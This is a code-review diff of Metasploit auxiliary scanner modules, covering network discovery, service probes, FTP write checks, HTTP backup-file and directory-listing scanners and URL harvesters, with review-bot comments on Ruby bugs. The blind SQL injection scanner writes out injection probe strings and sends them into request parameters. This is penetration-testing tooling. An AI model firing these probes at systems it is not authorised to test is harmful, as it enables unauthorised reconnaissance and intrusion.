status << "ERROR=#{error} " if error
print_status(status)
print_status("")
end
end
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error: #{e}")
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Remote Management Interface Discovery',
'Version' => '$Revision$',
'Description' => %q{
This module can be used to obtain information from the Remote
This module can be used to obtain information from the Remote
Management Interface DCERPC service.
},
'Author' => 'hdm',
'License' => MSF_LICENSE
)
deregister_options('RHOST')
register_options(
[
Opt::RPORT(135)
], self.class)
], self.class)
end
# Obtain information about a single host
def run_host(ip)
def run_host(ip)
begin
ids = dcerpc_mgmt_inq_if_ids(rport)
return if not ids
ids.each do |id|
print_status("UUID #{id[0]} v#{id[1]}")
stats = dcerpc_mgmt_inq_if_stats(rport)
print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats
live = dcerpc_mgmt_is_server_listening(rport)
print_status("\t listening: %.8x" % live) if live
@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary
princ = dcerpc_mgmt_inq_princ_name(rport)
print_status("\t name: #{princ.unpack("H*")[0]}") if princ
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error: #{e}")
end
end
end


@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'ARP Sweep Local Network Discovery',
@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'belch',
'License' => MSF_LICENSE
)
register_options([
OptString.new('SHOST', [true, "Source IP Address"]),
OptString.new('SMAC', [true, "Source MAC Address"]),
], self.class)
deregister_options('SNAPLEN', 'FILTER')
end
@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary
end
def run_batch(hosts)
shost = datastore['SHOST']
shost = datastore['SHOST']
smac = datastore['SMAC']
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
begin
hosts.each do |dhost|
probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost)
capture.inject(probe)
@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary
while(reply = getreply())
next if not reply[:arp]
print_status("#{reply[:arp].spa} appears to be up.")
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
end
end
etime = Time.now.to_f + (hosts.length * 0.05)
while (Time.now.to_f < etime)
while(reply = getreply())
next if not reply[:arp]
print_status("#{reply[:arp].spa} appears to be up.")
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
end
Kernel.select(nil, nil, nil, 0.50)
end
ensure
close_pcap()
end
end
def buildprobe(shost, smac, dhost)
n = Racket::Racket.new
n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14))
n.l2.src_mac = smac
n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff'
n.l2.ethertype = 0x0806
n.l3 = Racket::L3::ARP.new
n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST
n.l3.sha = n.l2.src_mac
@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
n.l3.tpa = dhost
n.pack
end
def getreply
pkt = capture.next
return if not pkt
eth = Racket::L2::Ethernet.new(pkt)
return if not eth.ethertype == 0x0806


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -10,10 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'EMC AlphaStor Device Manager Service.',
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'MC',
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(3000),], self.class)
end
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
connect
pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512
sock.put(pkt)
sleep(0.25)
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Host #{ip} is running the EMC AlphaStor Device Manager.")
else
print_error("Host #{ip} is not running the service...")
end
end
disconnect


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -10,10 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'EMC AlphaStor Library Manager Service.',
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'MC',
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(3500),], self.class)
end
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
connect
pkt = "\x51" + "\x00" * 529
sock.put(pkt)
sleep(1)
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Host #{ip} is running the EMC AlphaStor Library Manager.")
else
print_error("Host #{ip} is not running the service...")
end
end
disconnect


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(21),
@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
def run_host(target_host)
begin
res = connect_login(true, false)
banner.strip! if banner
dir = Rex::Text.rand_text_alpha(8)
if res
if res
write_check = send_cmd( ['MKD', dir] , true)
if (write_check and write_check =~ /^2/)
@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary
end
disconnect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError, ::IOError
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Backup File Scanner',
'Description' => %q{
This module identifies the existence of possible copies
This module identifies the existence of possible copies
of a specific file in a given path.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp'])
], self.class)
], self.class)
end
def run_host(ip)
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
'.backup',
'.bak',
'.copy',
'.old',
'.old',
'.orig',
'.temp',
'.txt',
@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{file}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
:type => 'BACKUP_FILE',
:data => "#{file}"
)
else
print_status("NOT Found #{wmap_base_url}#{file}")
print_status("NOT Found #{wmap_base_url}#{file}")
#To be removed or just displayed with verbose debugging.
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner',
'Description' => %q{
This module identifies the existence of Blind SQL injection issues
This module identifies the existence of Blind SQL injection issues
in GET Query parameters values.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('METHOD', [true, "HTTP Method","GET"]),
@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('QUERY', [ false, "HTTP URI Query", '']),
OptString.new('DATA', [ false, "HTTP Body Data", '']),
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
], self.class)
], self.class)
end
def run_host(ip)
gvars = nil
pvars = nil
cvars = nil
rnum=rand(10000)
rnum=rand(10000)
valstr = [
[ 'numeric',
[ 'numeric',
" AND #{rnum}=#{rnum} ",
" AND #{rnum}=#{rnum+1} "
],
[ 'single quotes',
],
[ 'single quotes',
"' AND '#{rnum}'='#{rnum}",
"' AND '#{rnum}'='#{rnum+1}"
],
[ 'double quotes',
[ 'double quotes',
"\" AND \"#{rnum}\"=\"#{rnum}",
"\" AND \"#{rnum}\"=\"#{rnum+1}"
]
@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
#
# Dealing with empty query/data and making them hashes.
#
if !datastore['QUERY'] or datastore['QUERY'].empty?
datastore['QUERY'] = nil
gvars = nil
else
gvars = queryparse(datastore['QUERY']) #Now its a Hash
end
if !datastore['DATA'] or datastore['DATA'].empty?
datastore['DATA'] = nil
pvars = nil
else
pvars = queryparse(datastore['DATA'])
end
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
datastore['COOKIE'] = nil
cvars = nil
@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary
end
#SEND NORMAL REQUEST
#SEND NORMAL REQUEST
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
sigtxt = ""
if normalres
if normalres.body.empty?
print_error("No body to obtain signature")
return
else
sigtxt = normalres.body
#print_status("#{sigtxt}")
#print_status("#{sigtxt}")
end
else
print_error("No response")
return
end
#print_status("Normal request sent.")
#print_status("Normal request sent.")
valstr.each do |tarr|
#QUERY
if gvars
gvars.each do |key,value|
gvars.each do |key,value|
gvars = queryparse(datastore['QUERY']) #Now its a Hash
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
#SEND TRUE REQUEST
gvars[key] = gvars[key]+tarr[1]
begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if normalres and trueres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
normalsize = normalres.body.length
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
if reltruesize == normalsize
if reltruesize == normalsize
#If true it means that we have a small better chance of this being a blind sql injection.
#SEND FALSE REQUEST
gvars[key] = gvars[key]+tarr[2]
gvars[key] = gvars[key]+tarr[2]
begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
#true_false_dist = edit_distance(falseres.body,trueres.body)
#print_status("rellenf #{relfalsesize}")
if reltruesize > relfalsesize
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
)
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
end
else
print_status("NO False Response.")
print_status("NO False Response.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
else
print_status("Normal and True requests are different.")
@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary
end
end
#DATA
if pvars
pvars.each do |key,value|
pvars.each do |key,value|
pvars = queryparse(datastore['DATA']) #Now its a Hash
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
#SEND TRUE REQUEST
pvars[key] = pvars[key]+tarr[1]
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary
end
pvarstr << tkey+'='+tvalue
end
begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if normalres and trueres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
normalsize = normalres.body.length
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
if reltruesize == normalsize
if reltruesize == normalsize
#If true it means that we have a small better chance of this being a blind sql injection.
#SEND FALSE REQUEST
pvars[key] = pvars[key]+tarr[2]
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
pvarstr << '&'
end
pvarstr << tkey+'='+tvalue
end
end
begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => pvarstr
}, 20)
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
if falseres
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
#true_false_dist = edit_distance(falseres.body,trueres.body)
#print_status("rellenf #{relfalsesize}")
if reltruesize > relfalsesize
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
report_note(
:host => ip,
:proto => 'HTTP',
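Review bot: The occurrence count on the `reltruesize` line, and again on the `relfalsesize` line, interpolates the test string into a regex unescaped, so a metacharacter in `tarr[1]`/`tarr[2]` (a parenthesis, `+`, `*`) changes what is counted or raises `RegexpError`, which none of the `rescue` clauses here catch; `String#scan` matches a plain string literally, so `trueres.body.scan(tarr[1]).length` and `falseres.body.scan(tarr[2]).length` count what was intended. Separately, `if pvarstr` right after `pvarstr = ""` is always true (the empty string is truthy in Ruby), so every request body is built with a leading `&`; it should be `unless pvarstr.empty?` here and in the identical loops of the error-based scanner further down the page. The values in `tarr` are assigned outside this hunk, and the enclosing loop starts and ends outside it.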
@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
)
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
else
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
end
else
print_status("NO False Response.")
print_status("NO False Response.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
else
print_status("Normal and True requests are different.")
@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("No response.")
end
end
end
end
end
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Copy File Scanner',
'Description' => %q{
This module identifies the existence of possible copies
This module identifies the existence of possible copies
of a specific file in a given path.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp'])
], self.class)
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
end
def run_host(ip)
conn = true
ecode = nil
emesg = nil
ecode = datastore['ErrorCode'].to_i
dm = datastore['NoDetailMessages']
prestr = [
'Copy_(1)_of_',
'Copy_(2)_of_',
@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary
'Copy',
'_'
]
tpathf = datastore['PATH']
testf = tpathf.split('/').last
#
# Detect error code
#
#
begin
randfile = Rex::Text.rand_text_alpha(5).chomp
filec = tpathf.sub(testf,randfile + testf)
res = send_request_cgi({
'uri' => filec,
'method' => 'GET',
@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
File.open(datastore['HTTP404Sigs']).each do |str|
if(res.body.index(str))
emesg = str
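Review bot: `File.open(datastore['HTTP404Sigs']).each do |str|` neither closes the file (no block form, no `close`) nor strips the line terminator, so each `str` carries its trailing newline and `res.body.index(str)` only matches when the signature happens to be followed by a newline in the body. `File.foreach(datastore['HTTP404Sigs']) do |str|` with `str = str.chomp` as the first line of the block fixes both; the same open-without-close appears on the DICTIONARY read in the interesting-file scanner's `run_host` later on this page. The `begin` block enclosing this code starts and ends outside the hunk.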
@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
return if not conn
@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary
if testf
prestr.each do |pre|
filec = tpathf.sub(testf,pre + testf)
begin
res = send_request_cgi({
'uri' => filec,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
end
else
if ecode != 400 and res.code.to_i == 400
print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]")
else
else
print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]")
report_note(
:host => ip,
:proto => 'HTTP',
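Review bot: When `send_request_cgi` returns nil the condition `if(not res or ...)` is true and the `print_status("NOT Found ...")` line then calls `res.code` on nil, raising `NoMethodError`, which the `rescue` clauses below (connection errors, `Timeout::Error`, `EPIPE`) do not catch, so one missing response aborts the whole `prestr.each` loop. Either skip early with `next unless res` before the check, or make the message nil-safe: `print_status("NOT Found #{filec} #{res ? res.code.to_i : 'no response'} [#{wmap_target_host}]")`. The same nil dereference is in the interesting-file scanner's thread block further down; `if dm == false` would also read better as `unless dm`. The `prestr.each` block ends outside the hunk.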
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
end
end


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Directory Listing Scanner',
'Description' => %q{
This module identifies directory listing vulnerabilities
in a given directory path.
This module identifies directory listing vulnerabilities
in a given directory path.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path to identify directoy listing", '/'])
], self.class)
], self.class)
end
def run_host(ip)
tpath = datastore['PATH']
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
end
begin
res = send_request_cgi({
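Review bot: The three-line `if tpath[-1,1] != '/'` block in `run_host` reads more directly as `tpath += '/' unless tpath.end_with?('/')`; the same slice test appears in the same-name-directory, interesting-file and previous-directory scanners later on this page. `run_host` continues past the end of the hunk.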
@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.code >= 200 and res.code < 300)
if res.to_s.include? "<title>Index of /" and res.to_s.include? "<h1>Index of /"
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DIR_LISTING',
:data => "#{tpath}"
)
end
if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>"
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DIR_LISTING',
:data => "#{tpath}"
)
end
else
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end


@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary
lastpage = 1
end
end
list.delete_if{|x| x==nil}
list.uniq!
list.sort!
return list
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'a') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
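Review bot: `list.delete_if{|x| x==nil}` at the tail of `pull_urls` is `list.compact!` spelled out, and the explicit `return list` is redundant as the method's last expression; the same three lines appear in the Archive.org module's `pull_urls` below, where the `for i in (0..(pages.count-1))` loop that prefixes each entry would read as `pages.map! { |p| "http://#{p}" }`. In `write_output`, `FileTest::exist?` is conventionally written `File.exist?`. `pull_urls` starts outside the hunk.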
@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Delicious.com")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
if datastore['OUTFILE']
write_output(urls.join("\n") + "\n")
else
urls.each do |i|
puts(i)
end
end
end
end
end


@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Archive.org stored URLs for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary
response.each do |line|
pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2')
end
pages.delete_if{|x| x==nil}
pages.uniq!
pages.sort!
for i in (0..(pages.count-1))
fix = "http://" + pages[i].to_s
pages[i] = fix
end
return pages
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'a') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Archive.org")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
if datastore['OUTFILE']
write_output(urls.join("\n") + "\n")
else
urls.each do |i|
puts(i)
end
end
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Error Based SQL Injection Scanner',
'Description' => %q{
